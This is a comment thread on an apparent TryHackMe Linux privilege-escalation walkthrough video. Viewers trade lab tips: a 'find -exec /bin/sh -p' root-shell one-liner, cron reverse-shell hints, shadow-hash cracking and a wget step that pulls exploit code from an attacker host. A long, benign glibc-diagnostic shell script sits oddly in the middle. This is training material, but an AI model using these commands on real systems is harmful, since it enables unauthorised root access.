Nice vid man. I like how you show the struggles of the process. It's somewhat of a relief that others have gone thru similar issues.
Yes indeed nice video
Agreed love these videos. For anyone confused about the errors during the section that starts around 40 mins in, they are two-fold. First off, the C code wasn't written wrong, he forgot to compile it. C code needs compiled before it can be run. That said, the machine can't use the gcc command anyways, so it wouldn't have mattered. Second off, he was trying to run a python3 code with the python command. Instead of running "python thm.py", it should have been "python3 thm.py". Now that said, we actually can't run thm.py bc the code is incorrectly written and we don't have access to rewrite it. So we needed to use code for the "thm" binary that doesn't need compiled (bash, python, etc.) and we need to run ./test since thm.py won't work.
your videos are so helpful, you have no idea, for someone trying to break into the field, and seeing someone struggle with these exercises even if already working for a while in the industry is reassuring! showing the whole process of problem-solving is helpful too. Definitely going to subscribe in order to access your notes too! keep it up man
On task five, in order to get the exploit to run, add the -static flag when compiling with gcc if you have a GLIBC version issue.
OH MY GOD, Thank you) Finally found it)
by the way add -static at the end of a command, after ofc.
what is the difference between -static compiling and normal compiling ?
@shadajjoshi3740 using -static option means that we want our executable to be static (non-dynamic) meaning that it will not require any additional libraries and can run on its own when executed and these libraries are not present on the machine we want to execute them on
Thank you so much. I had this same issue. You are a LEGEND!!
FYI, if you are using the attack machine provided by THM you will not be able to gcc the exploit to compiled file on your attack machine, however accessing the target from browser and saving the exploit /tmp then gcc then ./exploit will result in successful privilege escalation
Thanks!!!
Good information, thank you!!
Sorry, what do you mean by accessing the target from browser, what is the command please.
Thank you so much for your videos. I cannot tell you how much your explanations have helped me. You're a natural teacher, I appreciate you!
Great walkthrough!
You are very comfortable to listen to and do a great job! Keep it up please :)
followed your video almost all the way! There are several times I got stuck and you jumped me in the right direction. I did not watch the capstone part though. I wanted to do that challenge by myself. I got it! Both flags!! Thank you for your help :)
Hi! I am doing the room and in the Task 6: Sudo I can't do "sudo -l". It asks me the password and say "Sorry, user karen may not run sudo on wade7363." Do you know how to do it?
Bro thank you for being on UA-cam, I learnt so much from you. I will try to practice more. You earned yourself a sup!
Could have never completed this without you thank you so much
Very good video, thank you very much, I also found that if you crack the root hash you can skip the following steps!!
good stuff! 10/10 video, straight to the point. learned a lot, thank youuu!!!!!!
Thanks for your help man I really like your videos when I need help, straight to the point.
Excellent video my friend. You are a great teacher. Thank you for taking the time to make these videos.
Really nice tutorial. I have been able to understand not only how to complete the tasks but the process itself. Thanks !!!
That blew my mind that you used nano to PrivEsc. There are so many unique and creative ways to move around a system I feel like the options are nearly limitless. The amount there is to learn feels infinite.
31:51 U sinking? All I could hear was a mouth full of water bubbles hahaa Your video helps me a lot bro, Keep it up! Thanks so much!
I did the Last (Capstone) Challenge by switching to user missy and from there escalate my privilege through find command to spawn shell as root. From there do what needs to be done
edit: I noticed you don't need to be root, but yeah I like freedom xD
Excellent working ! thanks for the video :) appreciate to combine all the tasks in single video
very clear thanks, will definitely use your cheatsheet for my oscp in like 3-4 months
Mail me the sheet
Where can I find the cheatsheet? Can you send it to me please.
Think you just needed to compile the C code for the path exploit. Great vid.
Thanks a lot for your help. I feel like this section privilege escalation was a jump on tryhackme
Awesome walkthrough, 10/10, thanks a lot
Thank you bro, I did the same steps on crontab, and I was wondering why I didn't get the reverse shell, I forgot the chmod +x, thanks bro
Long story short, really helpful vid. Thanks for that!
Excellent walk-through, many thanks for your help, and all the knowledge you share 🙏
on the capstone challenge missy has sudo permission on "find" and we can easily gain root shell with this "./find . -exec /bin/sh -p \; -quit" command
In this class, some things I understood and others I didn't.
Friend, please make more difficult ctfs 🙏🙏🙏🙏🙏
Thank you! This is a great help! Please, let me know what resource did you use on 33 min 42sec with all this helpful stuff?
You are welcome! If you meant the notes, they can be accessed through the channel membership or through this link
buymeacoffee.com/notescatalog/extras
What can I do if my Kali Linux compiles this "ofc" file using libc version 2.34 and the target Linux system has an older version (2.19) installed and I receive an error?
To avoid compatibility issues, try compiling the code directly on the SSH machine where it will be executed. This ensures that all binaries and libraries are aligned with the system’s GCC version and libraries.
straight to the point, very clear ...thank you a lot
Thank you for a great video!
46:14 -> The Path-based escalation one
I think it didn't work because your file was the source file and the test file might have expected a compiled binary?
That's C code, we have to use Python code in /tmp/thm
Yeah, right. You have to compile it first. It's also explained in this THM Chapter.
But I ended up using Python, cause it was faster for me. But his method was even faster :D
you are awesome with a clear voice, thanks a lot.
Thank you so much Sir...this video helps me a lot 🙂❤️
Great video, but PLEASE USE CTRL + L next time for cleaning up terminal.
Did this before your video but thanks. Linux privesc was the hardest for me.
I've had so many steps fail on these tasks. When I execute a command or follow the steps, some just fail. It's like the wrong VM is loading for the task.
Thanks Motasem for sharing your knowledge, amazing job!!!
At the NFS part, after compiling and going to the target machine I get the error: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./code)
Why do I get this?
I have the same error, when I execute the "code" in the target machine I get the error that AV says. How can I fix it?
me too
I solved the problem, use TryHackMe's attack machine
@boyqb but what about real life situation, I am unable to solve it and the only option seems to be to download an old version of Ubuntu and then compile the C code to be used at attack machine
I appreciate your videos, I'm not sure why I can never ssh into TryHackMe from my Kali VM terminal... either way it won't stop me from completing my training and getting my CompTIA certificate!
Is it possible to get a copy of your notes library? It is quite extensive. I am working to build my own, but i am a newbie in the field.
Hi there. How did you know that flag3 is located in /home/ubuntu? From my understanding, we didn't have root privileges for search, and the solution would be to create a new user with root privileges. Am I wrong?
7:04 compiling issue - implicit declaration of function
Thanks man, this video was a big help!
This was really helpful. Thanks so much!
Which version of Kali is this? 🐉👨💻
Because it didn't work with the current version of 2024...
you are such a life saver. Thank you for all the knowledge bombs!
Hello great video, I learned a lot, you have already helped me a lot in several rooms at THM, I would like to ask where do you get these ready-made scripts from, if they are yours and they are somewhere, or if it is from a site open for use?
Hello, Notes are part of channel membership tier 2
for task 10.2 the thm file should have "cat /home/matt/flag6.txt" so when you run the test file it would read the flag file.
loved it man , nicely explained
Thank you very much, one of the best tutorials available.
Hey! Thanks for your help. - Your note document, do you share that, for quick access to commands?
Of course, check this out
buymeacoffee.com/notescatalog/extras
Thank you very much ! Your videos are very helpful!
I think the C file wasn't working because you didn't compile it first?
How do I easily copy from attacker machine to target and vice versa? It's eating a lot of my time.
Took me 9 hours watching the video and trying it by myself as I don't know anything about priv esc. The only part I didn't understand is the privilege escalation: PATH
thankyou helped a lot
Nice video bro! not sure what "thm.py" is about in task 10, because "test" seems like a C-compiled executable that does the job, but python is only interpreted :p
if you logged in with missy account and you type sudo -l then you get a message that you can get root permissions with the find suid binary
Thank you , keep up the good work!
I really appreciate your hard work on this video. I have a doubt: when you cracked missy's hash, how did you do it? I created a file named "missy" just like yours, and then I put the hash in it. I saved and closed the file, and finally, I used the same "john" command. However, my output was "0 password hashes craked, 1 left", Can you help me? :(
thank you so much for the video, I have been stuck on crontab for 3 days 😂😂
Same, I couldn't get a reverse shell.
@ilyasessar7267 yes
Hey man, i got a syntax error (Unterminated quoted string) when executing ./ofc? Kind of strange, i didn't edit it 9:15
From where we can get the Linux Local Privilege Escalation C code?
Is there any way to get those notes that you have so good?
I mean those who leave at minute 33:49 for example :)
Very helpful, thanks amigo 🔥❤
says permission denied when I try to get the first flag1.txt
Why am I not able to download from the exploit-db website?
Can anyone help me? I am very thankful to you.
I can't download the exploit at 9:02, I tried it with the attackbox and the Kali machine but I don't have the permission, can someone explain to me why?
thank you for the precious help, what about that script library? what's your recommendation on constituting scripts library? thank you for your reply
Awesome vid!
Amazing job, thank you!
I did the same thing with the capstone where i used the gtfo stuff to read it and didn't bother needing to switch to the root user (assume this is all that's expected)
Hi Motasem! I'm very thankful for your walkthroughs - they bring me a lot of knowledge. I have one question for you. In this task about Privilege Escalation NFS I've done everything like you show in the movie above but at the end I saw an error about conflicts in libraries. I think the Kali Linux which I use had a higher version of gcc than the target machine. So I can't finish this task on my own because the targeted machine doesn't want to open the code file. How can we handle this problem in this task and in a real situation when the targeted machine has another version of libraries and doesn't open a file with code?
I received an answer on Discord. I need to use a -static flag when compiling in gcc.
@kamilnowicki1912 bro ur a life saver, I've been trying to fix this for 1 hour
very good topic but unfortunately sound is very low.. please amend it. ty
thank you!!!! it's really helpful. I saw the comment about 49:38, the file failed to execute because it needs to be C/C++. I wonder how to determine whether the file needs to be C/C++ or not.
you're a genius bro thanks a lot for your help
Thank you for this video.
Hello friend, thank you very much for your videos, I wanted to ask you, I have seen in some videos that you use a note book where you have some saved commands, also reverse shell codes. Where can I get that notebook? is it public or paid?
Hi Jorge, the notes are part of channel membership
thank you i will join soon
Hi
Thank you so much for all your help and investment!
Very appreciated!
Question: Is there a situation you can compress the obsidian collection, and share it with us?
Notes are part of my channel membership. Link Below
ua-cam.com/channels/NSdU_1ehXtGclimTVckHmQ.htmljoin
Note that notes are only available online to preserve copyrights.
Also Notes are always updated with new content as well that's why one needs to subscribe for continuous access. FYI
task 11 @ 49:55
task 12 @ 56:10
Plz do a writeup for the new room, Windows Privilege Escalation
How to download this cheatsheet to my Obsidian? For free of course.
what is the point of reading /etc/shadow when I can brute force ssh directly rather than the hash
Both methods work but /etc/shadow is used most when you already have access and you want to establish persistence.
awesome Motasem Hmdan. i like your video. MASHA ALLAH
Sir I am stuck at NFS
The shared folder is not populating with my created shell C code, nothing is synced. What to do?
Hi!
How to get your cheat sheet please?
I would like to know why did you choose base64? 19:50
Hello! Any way I can get your Scripts sheet like you are using in the video? Is it through Obsidian?
Hello, you can subscribe to the channel membership tier 2 to get access to all the notes, link below
ua-cam.com/channels/NSdU_1ehXtGclimTVckHmQ.htmljoin
Or if you are interested in one subject among the others, you can pay for one time. The notes that are available for one time purchase can be found below
buymeacoffee.com/notescatalog/extras
You are life saver bro
Hi, @9:31 unable to establish privilege escalation due to GCC version mismatch, mine is 2.37 but supported is 2.19 ...
Unable to step down the version, pls suggest
@55:44, same issue, I think the updated version of Kali gcc doesn't run on the old gcc which is on the TryHackMe machine
I had the same issue, I just solved it.
When you are about to convert your nfs.c file you need to add -static before it.
gcc -static nfs.c -o nfs
To avoid compatibility issues, try compiling the code directly on the SSH machine where it will be executed. This ensures that all binaries and libraries are aligned with the system’s GCC version and libraries.
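The `GLIBC_2.34' not found error quoted in these comments comes from the dynamic loader: a dynamically linked binary records the newest glibc symbol version it was built against, and a host with an older glibc refuses to load it. The shell sketch below is an added example, not code from the video or from any commenter; the function names and the sample symbol listing are constructed for illustration, and the versions 2.34, 2.37 and 2.19 are the ones mentioned in the comments.

```shell
#!/usr/bin/env bash
# Added example: explain a "version `GLIBC_x.y' not found" failure by comparing
# the newest glibc symbol version a binary requires with what a host provides.

# Constructed sample in the style of `objdump -T` output for a dynamically
# linked binary built on a recent distribution (not taken from a real file).
SAMPLE_DYNSYM='0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.2.5) puts
0000000000000000      DF *UND*  0000000000000000 (GLIBC_2.34)  __libc_start_main
0000000000000000  w   D  *UND*  0000000000000000  Base        __gmon_start__'

# Print the highest GLIBC_<major>.<minor> found on stdin, or nothing at all.
# Major and minor are compared as integers, so 2.34 ranks above 2.9.
max_glibc_required() {
    { grep -oE 'GLIBC_[0-9]+\.[0-9]+' || true; } \
        | sed 's/^GLIBC_//' \
        | awk -F. '
            { a = $1 + 0; b = $2 + 0
              if (!seen || a > maj || (a == maj && b > min)) { maj = a; min = b }
              seen = 1 }
            END { if (seen) print maj "." min }'
}

# Exit 0 when a host whose glibc is $2 can satisfy a requirement of $1.
glibc_satisfies() {
    awk -v need="$1" -v have="$2" 'BEGIN {
        split(need, n, "."); split(have, h, ".")
        ok = (h[1] + 0 > n[1] + 0) || (h[1] + 0 == n[1] + 0 && h[2] + 0 >= n[2] + 0)
        exit !ok
    }'
}

# Read a symbol listing on stdin and report against host glibc version $1.
check_binary() {
    host_glibc="$1"
    needed=$(max_glibc_required)
    if [ -z "$needed" ]; then
        echo "no versioned glibc symbols (static binary or not linked to glibc)"
    elif glibc_satisfies "$needed" "$host_glibc"; then
        echo "ok: needs GLIBC_$needed, host has $host_glibc"
    else
        echo "mismatch: needs GLIBC_$needed, host has $host_glibc"
    fi
}

# Demo on the constructed sample: the old host fails, the new one loads it.
printf '%s\n' "$SAMPLE_DYNSYM" | check_binary 2.19
printf '%s\n' "$SAMPLE_DYNSYM" | check_binary 2.37

# On a real system the inputs would come from:
#   objdump -T ./binary          (symbol listing for stdin)
#   getconf GNU_LIBC_VERSION     (prints e.g. "glibc 2.19" on the host)
```

A statically linked build carries its own copy of the library code and has no versioned imports, which is why the -static flag discussed above makes the error disappear.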
Hi Motasem, may I know where to purchase your complete notes/cheatsheet. Thank you
Hello, you can subscribe to the channel membership tier 2 to get access to all the notes, link below
ua-cam.com/channels/NSdU_1ehXtGclimTVckHmQ.htmljoin
Or if you are interested in one subject among the others, you can pay for one time. The notes that are available for one time purchase can be found below
motasem-notes.net/
@MotasemHamdan thank you, your videos are very helpful!
It is a great video! Thank you! Can I access or download your cheatsheet online somewhere?
Hello, Online notes are part of channel membership. Take a look below
ua-cam.com/channels/NSdU_1ehXtGclimTVckHmQ.htmljoin
Great video Mate, I got all flags. But can you try to escalate yourself to root in this machine. I tried every method but i couldn't. Can you try to get yourself as root?..
I will, sure.
@MotasemHamdan Thanks mate. Hoping to get a small write-up on getting Root-user
Why do we need to give the thm the SUID bit???
Good video. Can't make it work. My ./nfs file won't run. Gave +s mod. Tried various mods. No joy. Any thoughts?
Compile the code using the attackbox. The exploit for some reason doesn't work if your compiler is newer
Great explanation and thanks for your work. By any chance can i get a copy of your notes plz ?
Thank you. Online access to notes is part of channel membership. Please read the details below
ua-cam.com/channels/NSdU_1ehXtGclimTVckHmQ.htmljoin
Thank goodness, all exploit databases are blocked in my place of learning! Bizarre considering we are a cyber lab
Thanks for the great video, really learnt a lot following along to this. The only trouble I had was in Task 7 when trying to execute the Base64 SUID exploit. I couldn't install the exploit on the machine as I didn't have sudo privileges (I was trying to get them!). You skipped over it a bit in your video (19:35) by just saying 'download it'. When I tried to do this logged in as the 'Karen' user, it wouldn't let me install it. I am a complete noob to all this so have no idea what I was doing wrong?
You didn't have write permissions for whatever folder you were trying to download to, make sure that you compile the script on your machine, then on your ssh client, cd into /tmp and run "wget (attacker_ip):(python_httpserver_port)/script"
hey can i get all of your scripts from which you choose
I can't get root when I have to change the backup.sh file and I intercept the connection, I keep getting into karen again, it won't make me root and I follow everything to the T so I'm not sure why it's not giving me root access through nc
Make sure that you don't execute backup.sh yourself rather by waiting for the cron job to do it.
@MotasemHamdan ahh okay I see, that worked finally I been trying to figure this out for so long thank you so much🤙🏿🤙🏿